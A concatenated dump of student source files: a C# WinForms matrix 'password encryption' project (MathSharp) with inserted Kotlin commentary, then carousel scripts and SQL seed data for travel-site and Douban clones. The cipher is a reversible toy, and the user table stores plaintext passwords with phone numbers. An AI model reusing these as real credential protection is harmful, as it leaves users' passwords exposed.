Senha_Cofatora[0, 0].ToString() + "\t" + Senha_Cofatora[0, 1].ToString() + "\t" + Senha_Cofatora[0, 2].ToString() + "\n" +
Senha_Cofatora[1, 0].ToString() + "\t" + Senha_Cofatora[1, 1].ToString() + "\t" + Senha_Cofatora[1, 2].ToString() + "\n" +
Senha_Cofatora[2, 0].ToString() + "\t" + Senha_Cofatora[2, 1].ToString() + "\t" + Senha_Cofatora[2, 2].ToString(), "Senha Cofatora"
);
}
}
private void txtSenhaInversa_Click(object sender, EventArgs e)
{
if (txtSenhaInversa.Text != "")
{
MessageBox.Show
(
Senha_Inversa[0, 0].ToString() + "\t" + Senha_Inversa[0, 1].ToString() + "\t" + Senha_Inversa[0, 2].ToString() + "\n" +
Senha_Inversa[1, 0].ToString() + "\t" + Senha_Inversa[1, 1].ToString() + "\t" + Senha_Inversa[1, 2].ToString() + "\n" +
Senha_Inversa[2, 0].ToString() + "\t" + Senha_Inversa[2, 1].ToString() + "\t" + Senha_Inversa[2, 2].ToString(), "Senha Inversa"
);
}
}
private void txtSenhaDescriptografia_Click(object sender, EventArgs e)
{
if (txtSenhaDescriptografia.Text != "")
{
MessageBox.Show
(
Math.Round(Senha_Descriptografia[0, 0], 0).ToString() + "\t" + Math.Round(Senha_Descriptografia[0, 1], 0).ToString() + "\t" + Math.Round(Senha_Descriptografia[0, 2], 0).ToString() + "\n" +
Math.Round(Senha_Descriptografia[1, 0], 0).ToString() + "\t" + Math.Round(Senha_Descriptografia[1, 1], 0).ToString() + "\t" + Math.Round(Senha_Descriptografia[1, 2], 0).ToString() + "\n" +
Math.Round(Senha_Descriptografia[2, 0], 0).ToString() + "\t" + Math.Round(Senha_Descriptografia[2, 1], 0).ToString() + "\t" + Math.Round(Senha_Descriptografia[2, 2], 0).ToString(), "Senha Descriptografia"
);
}
}
private void btnRandom_Click(object sender, EventArgs e)
{
Zerar_Parcial();
Random Randômico = new Random();
for (int l = 0; l <= 2; l++)
{
for (int c = 0; c <= 2; c++)
{
String Nome = "txtSenha" + l + "x" + c;
TextBox txtSenha = this.Controls.Find(Nome, true).FirstOrDefault() as TextBox;
txtSenha.Text = Randômico.Next(0, 9999).ToString();
}
btnCriptografar.Focus();
}
}
}
}
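The full order-three pipeline in the form above — Sarrus-rule determinant, transpose, cofactor (adjugate) matrix, inverse as adjugate divided by the determinant, and the final master × inverse product that recovers the password — condenses into a few functions. A compact Kotlin sketch of the same mathematics (illustrative, using `Double` instead of `float` to reduce rounding noise):

```kotlin
typealias M3 = Array<DoubleArray>

// Sarrus' rule, exactly as in btnCriptografar_Click: three left-to-right
// diagonals minus three right-to-left diagonals.
fun det3(m: M3): Double =
    m[0][0] * m[1][1] * m[2][2] + m[0][1] * m[1][2] * m[2][0] + m[0][2] * m[1][0] * m[2][1] -
    m[0][2] * m[1][1] * m[2][0] - m[0][0] * m[1][2] * m[2][1] - m[0][1] * m[1][0] * m[2][2]

// Standard row-by-column product of two 3x3 matrices.
fun mul3(a: M3, b: M3): M3 = Array(3) { i ->
    DoubleArray(3) { j -> (0..2).sumOf { k -> a[i][k] * b[k][j] } }
}

// Inverse via the adjugate: signed 2x2 minors (cofactors), divided by det.
fun inv3(m: M3): M3 {
    val d = det3(m)
    require(d != 0.0) { "singular matrix has no inverse" }
    fun cof(r: Int, c: Int): Double {
        val rs = (0..2).filter { it != r }
        val cs = (0..2).filter { it != c }
        val minor = m[rs[0]][cs[0]] * m[rs[1]][cs[1]] - m[rs[0]][cs[1]] * m[rs[1]][cs[0]]
        return if ((r + c) % 2 == 0) minor / d else -minor / d
    }
    // inv[i][j] = cofactor(j, i) / det: the transpose step is folded into the indexing.
    return Array(3) { i -> DoubleArray(3) { j -> cof(j, i) } }
}
```

The adjugate-based inverse is exactly what `btnCofatorar_Click` and `btnDescriptografar_Click` compute step by step; multiplying the master matrix by it recovers the original password matrix.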
<file_sep># MathSharp (2017)
Hands-on project used as the final assessment for the Mathematics course taught by Prof. <NAME> at the Instituto Federal de São Paulo, Hortolândia Campus.
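For the order-two form that follows, no cofactor machinery is needed: the 2×2 inverse has a closed form, 1/det times the matrix with the main diagonal swapped and the off-diagonal entries negated. A minimal Kotlin sketch (the `M2` type is illustrative, not from the project):

```kotlin
// Closed-form 2x2 inverse: swap the main diagonal, negate the off-diagonal,
// divide everything by the determinant ad - bc.
data class M2(val a: Double, val b: Double, val c: Double, val d: Double) {
    val det get() = a * d - b * c

    // Row-by-column product of two 2x2 matrices.
    operator fun times(o: M2) = M2(
        a * o.a + b * o.c, a * o.b + b * o.d,
        c * o.a + d * o.c, c * o.b + d * o.d
    )

    fun inverse(): M2 {
        val dt = det
        require(dt != 0.0) { "singular matrix has no inverse" }
        return M2(d / dt, -b / dt, -c / dt, a / dt)
    }
}
```

Multiplying the master matrix by this inverse recovers the password matrix, which is the round trip `btnDescriptografar_Click` performs in the order-two form.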
<file_sep>using System;
using System.Linq;
using System.Windows.Forms;
namespace MathSharp
{
public partial class frmOrdemDois : Form
{
public frmOrdemDois()
{
InitializeComponent();
}
public static float[,] Senha_Comum; // PASSWORD MATRIX (entered by the user)
public static float[,] Senha_Criptografia; // ENCRYPTION MATRIX (auxiliary matrix formed by multiplying the elements of the PASSWORD MATRIX)
public static float[,] Senha_Mestre; // MASTER MATRIX (product of the PASSWORD MATRIX x ENCRYPTION MATRIX)
public static float[,] Senha_Inversa; // INVERSE MATRIX (inverse of the ENCRYPTION MATRIX)
public static float[,] Senha_Descriptografia; // DECRYPTION MATRIX (product of the MASTER MATRIX x INVERSE MATRIX = PASSWORD MATRIX)
private void frmOrdemDois_FormClosed(object sender, FormClosedEventArgs e)
{
frmPrincipal Principal = new frmPrincipal();
Principal.Show();
this.Hide();
}
private void btnCriptografar_Click(object sender, EventArgs e)
{
try
{
// PASSWORD MATRIX: an order-2 matrix whose values are entered by the user.
// Its only constraint is the range of its elements: positive integers no greater than 9999.
float[,] Senha = { { 0, 0 }, { 0, 0 } };
for (int l = 0; l <= 1; l++)
{
for (int c = 0; c <= 1; c++)
{
String Nome = "txtSenha" + l + "x" + c;
TextBox txtSenha = this.Controls.Find(Nome, true).FirstOrDefault() as TextBox;
Senha[l, c] = float.Parse(txtSenha.Text);
}
}
Senha_Comum = Senha;
// Determinant of the PASSWORD MATRIX (if the determinant is 0, by definition the inverse does not exist)
float Determinante;
Determinante = (Senha_Comum[0, 0] * Senha_Comum[1, 1]) - (Senha_Comum[1, 0] * Senha_Comum[0, 1]);
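// A quick numeric check of the determinant formula above (illustrative values,
// not produced by the program): for Senha = [[2, 3], [1, 4]],
// Determinante = (2 * 4) - (1 * 3) = 5, which is non-zero, so the matrix is invertible.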
if (Determinante == 0)
{
MessageBox.Show("Não foi possível criptografar a senha.\nA matriz senha comum tem zero como determinante.", "Aviso", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
Zerar_Tudo();
}
else
{
// ENCRYPTION MATRIX: an auxiliary matrix that will be multiplied by the PASSWORD MATRIX.
// It is built by multiplying the elements of the PASSWORD MATRIX according to the rule below:
// - [Senha(L0C0) x 73] (ASCII 73 = I)
// - [Senha(L0C1) x 70] (ASCII 70 = F)
// - [Senha(L1C0) x 83] (ASCII 83 = S)
// - [Senha(L1C1) x 80] (ASCII 80 = P)
float[,] Criptografia = {
// Column 0 // Column 1
{ Senha[0, 0] * 73, Senha[0, 1] * 70 } , // Row 0
// Column 0 // Column 1
{ Senha[1, 0] * 83, Senha[1, 1] * 80 } // Row 1
};
Senha_Criptografia = Criptografia;
txtSenhaCriptografia.Text = Senha_Criptografia[0, 0].ToString() + " " + Senha_Criptografia[0, 1].ToString() + " " + Senha_Criptografia[1, 0].ToString() + " " + Senha_Criptografia[1, 1].ToString();
// MASTER MATRIX: generated by multiplying the ENCRYPTION MATRIX by the PASSWORD MATRIX.
float[,] Mestre =
{
// ROW 0
{
(Senha_Comum[0, 0] * Senha_Criptografia[0, 0]) + (Senha_Comum[0, 1] * Senha_Criptografia[1, 0]) , // COLUMN 0
(Senha_Comum[0, 0] * Senha_Criptografia[0, 1]) + (Senha_Comum[0, 1] * Senha_Criptografia[1, 1]) // COLUMN 1
} ,
// ROW 1
{
(Senha_Comum[1, 0] * Senha_Criptografia[0, 0]) + (Senha_Comum[1, 1] * Senha_Criptografia[1, 0]) , // COLUMN 0
(Senha_Comum[1, 0] * Senha_Criptografia[0, 1]) + (Senha_Comum[1, 1] * Senha_Criptografia[1, 1]) // COLUMN 1
}
};
Senha_Mestre = Mestre;
txtSenhaMestre.Text = Senha_Mestre[0, 0].ToString() + " " + Senha_Mestre[0, 1].ToString() + " " + Senha_Mestre[1, 0].ToString() + " " + Senha_Mestre[1, 1].ToString();
Zerar_Parcial();
btnDescriptografar.Enabled = true;
btnDescriptografar.Focus();
}
}
catch
{
MessageBox.Show("Dados inválidos, favor digitar novamente.", "Aviso", MessageBoxButtons.OK, MessageBoxIcon.Error);
Zerar_Tudo();
}
}
private void btnDescriptografar_Click(object sender, EventArgs e)
{
// Determinant of the ENCRYPTION MATRIX (if the determinant is 0, by definition its inverse does not exist)
float Determinante;
Determinante = (Senha_Criptografia[0, 0] * Senha_Criptografia[1, 1]) - (Senha_Criptografia[1, 0] * Senha_Criptografia[0, 1]);
if (Determinante == 0)
{
MessageBox.Show("Não foi possível descriptografar a senha.\nA matriz criptografia tem zero como determinante.", "Aviso", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
Zerar_Tudo();
}
else
{
// INVERSE MATRIX: built from the ENCRYPTION MATRIX using the order-2 rule
// (this is the adjugate: swap the main diagonal and negate the other two entries;
// the division by the determinant is applied in the decryption step below)
float[,] Inversa = { // Column 0 // Column 1
{ Senha_Criptografia[1, 1] , -Senha_Criptografia[0, 1] } , // Row 0
// Column 0 // Column 1
{ -Senha_Criptografia[1, 0] , Senha_Criptografia[0, 0] } // Row 1
};
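// Worked example of the order-2 rule above (illustrative values, not from the program):
// for Criptografia = [[4, 7], [2, 6]], the adjugate built here is [[6, -7], [-2, 4]]
// and Determinante = (4 * 6) - (2 * 7) = 10; dividing the adjugate by 10 gives the
// true inverse [[0.6, -0.7], [-0.2, 0.4]], and multiplying it back yields the identity.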
Senha_Inversa = Inversa;
txtSenhaInversa.Text = Senha_Inversa[0, 0].ToString() + " " + Senha_Inversa[0, 1].ToString() + " " + Senha_Inversa[1, 0].ToString() + " " + Senha_Inversa[1, 1].ToString();
// DECRYPTION MATRIX: the MASTER MATRIX multiplied by the INVERSE MATRIX (each entry divided by the determinant), recovering the PASSWORD MATRIX
float[,] Descriptografia =
{
// ROW 0
{
(Senha_Mestre[0, 0] * (Senha_Inversa[0, 0] / Determinante)) + (Senha_Mestre[0, 1] * (Senha_Inversa[1, 0] / Determinante)) , // COLUMN 0
(Senha_Mestre[0, 0] * (Senha_Inversa[0, 1] / Determinante)) + (Senha_Mestre[0, 1] * (Senha_Inversa[1, 1] / Determinante)) // COLUMN 1
} ,
// ROW 1
{
(Senha_Mestre[1, 0] * (Senha_Inversa[0, 0] / Determinante)) + (Senha_Mestre[1, 1] * (Senha_Inversa[1, 0] / Determinante)) , // COLUMN 0
(Senha_Mestre[1, 0] * (Senha_Inversa[0, 1] / Determinante)) + (Senha_Mestre[1, 1] * (Senha_Inversa[1, 1] / Determinante)) // COLUMN 1
}
};
Senha_Descriptografia = Descriptografia;
txtSenhaDescriptografia.Text = Math.Round(Senha_Descriptografia[0, 0], 0).ToString() + " " + Math.Round(Senha_Descriptografia[0, 1], 0).ToString() + " " + Math.Round(Senha_Descriptografia[1, 0], 0).ToString() + " " + Math.Round(Senha_Descriptografia[1, 1], 0).ToString();
btnZerar.Focus();
}
}
private void btnZerar_Click(object sender, EventArgs e)
{
Zerar_Tudo();
}
// The routines below handle housekeeping tasks such as clearing fields, selecting text, and generating random numbers.
// They do not directly affect how the system works; they only keep the code organized.
public void Zerar_Tudo()
{
for (int l = 0; l <= 1; l++)
{
for (int c = 0; c <= 1; c++)
{
String Nome = "txtSenha" + l + "x" + c;
TextBox txtSenha = this.Controls.Find(Nome, true).FirstOrDefault() as TextBox;
txtSenha.Clear();
}
}
Senha_Comum = null;
Senha_Criptografia = null;
Senha_Mestre = null;
Senha_Inversa = null;
Senha_Descriptografia = null;
txtSenhaMestre.Clear();
txtSenhaCriptografia.Clear();
txtSenhaInversa.Clear();
txtSenhaDescriptografia.Clear();
btnDescriptografar.Enabled = false;
txtSenha0x0.Focus();
}
public void Zerar_Parcial()
{
txtSenhaInversa.Clear();
txtSenhaDescriptografia.Clear();
Senha_Inversa = null;
Senha_Descriptografia = null;
btnDescriptografar.Enabled = false;
}
private void txtSenha0x0_Enter(object sender, EventArgs e)
{
txtSenha0x0.SelectAll();
}
private void txtSenha0x1_Enter(object sender, EventArgs e)
{
txtSenha0x1.SelectAll();
}
private void txtSenha1x0_Enter(object sender, EventArgs e)
{
txtSenha1x0.SelectAll();
}
private void txtSenha1x1_Enter(object sender, EventArgs e)
{
txtSenha1x1.SelectAll();
}
private void txtSenha0x0_KeyPress(object sender, KeyPressEventArgs e)
{
Zerar_Parcial();
if (!Char.IsDigit(e.KeyChar) && e.KeyChar != (char)8)
{
e.Handled = true;
}
}
private void txtSenhaMestre_Click(object sender, EventArgs e)
{
if (txtSenhaMestre.Text != "")
{
MessageBox.Show
(
Senha_Mestre[0, 0].ToString() + "\t" + Senha_Mestre[0, 1].ToString() + "\n" +
Senha_Mestre[1, 0].ToString() + "\t" + Senha_Mestre[1, 1].ToString(), "Senha Mestre"
);
}
}
private void txtSenhaCriptografia_Click(object sender, EventArgs e)
{
if (txtSenhaCriptografia.Text != "")
{
MessageBox.Show
(
Senha_Criptografia[0, 0].ToString() + "\t" + Senha_Criptografia[0, 1].ToString() + "\n" +
Senha_Criptografia[1, 0].ToString() + "\t" + Senha_Criptografia[1, 1].ToString(), "Senha Criptografia"
);
}
}
private void txtSenhaInversa_Click(object sender, EventArgs e)
{
if (txtSenhaInversa.Text != "")
{
MessageBox.Show
(
Senha_Inversa[0, 0].ToString() + "\t" + Senha_Inversa[0, 1].ToString() + "\n" +
Senha_Inversa[1, 0].ToString() + "\t" + Senha_Inversa[1, 1].ToString(), "Senha Inversa"
);
}
}
private void txtSenhaDescriptografia_Click(object sender, EventArgs e)
{
if (txtSenhaDescriptografia.Text != "")
{
MessageBox.Show
(
Math.Round(Senha_Descriptografia[0, 0], 0).ToString() + "\t" + Math.Round(Senha_Descriptografia[0, 1], 0).ToString() + "\n" +
Math.Round(Senha_Descriptografia[1, 0], 0).ToString() + "\t" + Math.Round(Senha_Descriptografia[1, 1], 0).ToString(), "Senha Descriptografia"
);
}
}
private void btnRandom_Click(object sender, EventArgs e)
{
Zerar_Parcial();
Random Randômico = new Random();
for (int l = 0; l <= 1; l++)
{
for (int c = 0; c <= 1; c++)
{
String Nome = "txtSenha" + l + "x" + c;
TextBox txtSenha = this.Controls.Find(Nome, true).FirstOrDefault() as TextBox;
txtSenha.Text = Randômico.Next(1, 10000).ToString(); // Random.Next's upper bound is exclusive, so this yields 1-9999, matching the stated limit
}
}
btnCriptografar.Focus();
}
}
}
|
b2c182827d9933de53e21cdabd498852f554417d
|
[
"Markdown",
"C#"
] | 4 |
C#
|
dumasmcarvalho/Y2017_MathSharp
|
71572bb2651486b2f8fb47f0685b28b1cd3bc670
|
7dfa40b3c4d18445face0d6826bc1d12e0d5c427
|
refs/heads/master
|
<file_sep>(function(){
    var num = 0;
    // keep a reference to the interval timer (previously an implicit global)
    var timer = setInterval(function(){
        num++;
        // wrap back to the first slide after the last image
        if(num > $('#index_d1>div:first-child>a>img').length - 1){
            num = 0;
        }
        $('#index_d1>div:first-child').animate({marginLeft: -1430 * num});
    }, 3000);
})()<file_sep>SET FOREIGN_KEY_CHECKS=0;
-- ----------------------------
-- Table structure for `xc_index_carousel`
-- ----------------------------
DROP TABLE IF EXISTS `xc_index_carousel`;
CREATE TABLE `xc_index_carousel` (
`cid` int(11) NOT NULL auto_increment,
`img` varchar(128) default NULL,
`title` varchar(64) default NULL,
`href` varchar(128) default NULL,
PRIMARY KEY (`cid`)
) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=utf8;
-- ----------------------------
-- Records of xc_index_carousel
-- ----------------------------
INSERT INTO `xc_index_carousel` VALUES ('1', 'img/70040v000000k11t696C6_1920_340_17.jpg', '轮播广告商品1', 'product_details.html?lid=28');
INSERT INTO `xc_index_carousel` VALUES ('2', 'img/70040w000000k5y3d6A18_1920_340_17.jpg', '轮播广告商品2', 'product_details.html?lid=19');
INSERT INTO `xc_index_carousel` VALUES ('3', 'img/70040v000000jvq6yA508_1920_340_17.jpg', '轮播广告商品3', 'lookforward.html');
INSERT INTO `xc_index_carousel` VALUES ('4', 'img/700w0v000000k9hpp3E43_1920_340_17.jpg', '轮播广告商品4', 'lookforward.html');
INSERT INTO `xc_index_carousel` VALUES ('5', 'img/700q0v000000k44t77928_1920_340_17.jpg', '轮播广告商品4', 'lookforward.html');
INSERT INTO `xc_index_carousel` VALUES ('6', 'img/700j0v000000jwodp64EA_1920_340_17.jpg', '轮播广告商品4', 'lookforward.html');
INSERT INTO `xc_index_carousel` VALUES ('7', 'img/700h0v000000k57dd85B7_1920_340_17.jpg', '轮播广告商品4', 'lookforward.html');
INSERT INTO `xc_index_carousel` VALUES ('8', 'img/700b0w000000k87556D5A_1920_340_17.jpg', '轮播广告商品4', 'lookforward.html');
-- ----------------------------
-- Table structure for `xc_index_lvyou`
-- ----------------------------
DROP TABLE IF EXISTS `xc_index_lvYou`;
CREATE TABLE `xc_index_product` (
`pid` int(11) NOT NULL auto_increment,
`title` varchar(64) default NULL,
`details` varchar(128) default NULL,
`pic` varchar(128) default NULL,
`xiwei` varchar(12) default NULL,
`price` decimal(10,2) default NULL,
`href` varchar(128) default NULL,
PRIMARY KEY (`pid`)
) ENGINE=InnoDB AUTO_INCREMENT=15 DEFAULT CHARSET=utf8;
-- ----------------------------
-- Records of xc_index_product
-- ----------------------------
INSERT INTO `xc_index_product` VALUES ('1', '自由行销售明星!早订+多人享惠', '三亚5日自由行(5钻)·【销售明星款..', 'img/300e0v000000k3izh1B48_C_500_280.jpg', '席位充足', '1646','1');
INSERT INTO `xc_index_product` VALUES ('2', '热卖爆款', '沙巴6日4晚自由行.【APP领券更优惠...', 'img/300c0h0000008rtxq3F6B_C_500_280.jpg', '席位充足', '2048','1');
INSERT INTO `xc_index_product` VALUES ('3', '马代五星岛屿特价放松,一家全包,密..', '马尔代夫吉哈Kihaa7日5晚自由行(5...',
'img/100j0k000000bdfzyAC5C_C_500_280.jpg', '席位充足', '6996','1');
INSERT INTO `xc_index_product` VALUES ('4', '森林庄园风格,威斯汀让你感受到一丝..', '兰卡威+吉隆坡7日6晚自由行·【国庆', 'img/100u0k000000bazls1A59_C_500_280.jpg', '席位充足', '4705','1');
-- ----------------------------
-- Table structure for `xc_user`
-- ----------------------------
DROP TABLE IF EXISTS `xc_user`;
CREATE TABLE `xc_user` (
`uid` int(11) NOT NULL auto_increment,
`uname` varchar(32) default NULL,
`upwd` varchar(32) default NULL,
`email` varchar(64) default NULL,
`phone` varchar(16) default NULL,
`avatar` varchar(128) default NULL,
`user_name` varchar(32) default NULL,
`gender` int(11) default NULL,
PRIMARY KEY (`uid`)
) ENGINE=InnoDB AUTO_INCREMENT=91 DEFAULT CHARSET=utf8;
-- ----------------------------
-- Records of xc_user
-- ----------------------------
INSERT INTO `xc_user` VALUES ('1', 'dingding', '123456', '<EMAIL>', '13511011000', 'img/avatar/default.png', '丁春秋', '0');
INSERT INTO `xc_user` VALUES ('2', 'dangdang', '123456', '<EMAIL>', '13501234568', 'img/avatar/default.png', '当当喵', '1');
INSERT INTO `xc_user` VALUES ('3', 'doudou', '123456', '<EMAIL>', '13501234569', 'img/avatar/default.png', '窦志强', '1');
INSERT INTO `xc_user` VALUES ('4', 'yaya', '123456', '<EMAIL>', '13501234560', 'img/avatar/default.png', '秦小雅', '0');
INSERT INTO `xc_user` VALUES ('5', '1111', '111111', '<EMAIL>', '18357100796', null, null, null);
INSERT INTO `xc_user` VALUES ('6', 'ABCD', '123456', '<EMAIL>', '13538894495', null, null, null);
INSERT INTO `xc_user` VALUES ('7', 'mohk', '123456', '<EMAIL>', '13512312312', null, null, null);
INSERT INTO `xc_user` VALUES ('8', '121123', 'w13945128995', '<EMAIL>', '13213389258', null, null, null);
INSERT INTO `xc_user` VALUES ('9', '555555', '5555555', '<EMAIL>', '13400000000', null, null, null);
INSERT INTO `xc_user` VALUES ('10', 'xuyong', '123456', '<EMAIL>', '15525623622', null, null, null);
INSERT INTO `xc_user` VALUES ('11', 'admin', 'cxy930123', '<EMAIL>', '13580510164', null, null, null);
INSERT INTO `xc_user` VALUES ('12', 'siyongbo', '900427', '<EMAIL>', '18447103998', null, null, null);
INSERT INTO `xc_user` VALUES ('13', 'qwerty', '123456', '<EMAIL>', '15617152367', null, null, null);
INSERT INTO `xc_user` VALUES ('14', 'dingziqiang', '456456', '<EMAIL>', '15567502520', null, null, null);
<file_sep>(async function(){
var res=await ajax({
url:"http://localhost:4000/index/",
type:"get",
dataType:"json"
});
var carousel= res.carousel;
new Vue({
el:"#index_d1>div:first-child",
data:{
carousel
}
})
var product = res.product;
new Vue({
el:"#tanx",
data:{
product
}
})
console.log(res);
})()<file_sep># Set the client connection charset
SET NAMES UTF8;
# Drop the database (if it exists)
DROP DATABASE IF EXISTS bean;
# Create the `bean` database (Douban clone)
CREATE DATABASE bean charset=utf8;
USE bean;
# Column 1: now showing (recent)
CREATE TABLE bean_recent(
id INT PRIMARY KEY AUTO_INCREMENT,
img_url VARCHAR(128),
title VARCHAR(64),
score FLOAT
);
# Insert data
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537399580.jpg",
"铁血战士",5.1
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537214991.jpg",
"胡桃夹子和四个王国",6.1
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2538070121.jpg",
"八仙",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2538555285.jpg",
"滴答屋",5.5
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535524955.jpg",
"流浪猫鲍勃",8.0
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537133715.jpg",
"冰封侠:时空行者",5.1
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535096871.jpg",
"无双",8.1
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2535550507.jpg",
"雪怪大冒险",7.6
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535365481.jpg",
"嗝嗝老师",7.5
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2533173724.jpg",
"昨日青空",6.1
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2534471408.jpg",
"找到你",7.4
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537871355.jpg",
"黑暗迷宫",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2530513100.jpg",
"影",7.4
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537392122.jpg",
"你美丽了我的人生",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535257594.jpg",
"阿拉姜色",7.6
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2538058163.jpg",
"阴阳眼之瞳灵公馆",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2533384240.jpg",
"李茶的姑妈",5.0
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2533822396.jpg",
"我的间谍前男友",6.3
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2536748718.jpg",
"帝企鹅日记2:召唤",7.2
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537061691.jpg",
"功夫联盟",3.6
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537238752.jpg",
"追鹰日记",7.3
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537032871.jpg",
"无敌原始人",6.3
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535445813.jpg",
"玛雅蜜蜂历险记",6.6
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2538072547.jpg",
"台仙魔咒",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2529701498.jpg",
"悲伤逆流成河",5.9
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535297332.jpg",
"新灰姑娘",4.2
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535476911.jpg",
"滴答屋",5.5
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535524955.jpg",
"暮光•巴黎",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2536679956.jpg",
"红高粱",8.3
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2533283770.jpg",
"江湖儿女",7.7
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2534554319.jpg",
"雪怪大冒险",7.6
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535365481.jpg",
"灵魂契约",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537681630.jpg",
"为你写诗",4.1
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2534091010.jpg",
"找到你",7.4
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537871355.jpg",
"阿凡提之奇缘历险",5.2
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2538045543.jpg",
"产科男生",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2536466873.jpg",
"跨越8年的新娘",7.0
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2506351287.jpg",
"养猪场的奇迹",6.6
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2531326284.jpg",
"宝贝儿",5.5
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2508608826.jpg",
"重金属囧途",8.1
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2534537200.jpg",
"我要去远方",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2508033801.jpg",
"黑色1847",7.1
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2520978483.jpg",
"麦昆",8.8
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2537054509.jpg",
"我的冤家是条狗",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2521821456.jpg",
"迪亚曼帝诺",5.6
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2524209517.jpg",
"盛夏",7.7
);
# Column 1: popular movies (movie)
CREATE TABLE bean_movie(
id INT PRIMARY KEY AUTO_INCREMENT,
img_url VARCHAR(128),
title VARCHAR(64),
score FLOAT
);
# Column 1: TV series (teleplay)
CREATE TABLE bean_teleplay(
id INT PRIMARY KEY AUTO_INCREMENT,
img_url VARCHAR(128),
title VARCHAR(64),
score FLOAT
);
# Column 1: variety shows (variety)
CREATE TABLE bean_variety(
id INT PRIMARY KEY AUTO_INCREMENT,
img_url VARCHAR(128),
title VARCHAR(64),
score FLOAT
);
# User table
CREATE TABLE bean_user(
id INT PRIMARY KEY AUTO_INCREMENT,
headportrait VARCHAR(128),
phone INT,
uname VARCHAR(64),
upwd VARCHAR(24)
);
INSERT INTO bean_user VALUES(
NULL,"https://img3.doubanio.com/icon/up52057602-1.jpg",1075938750,"星夜流云",123456
);
INSERT INTO bean_user VALUES(
NULL,"https://img3.doubanio.com/icon/up147712190-14.jpg",1075938751,"张小四",123456
);
INSERT INTO bean_user VALUES(
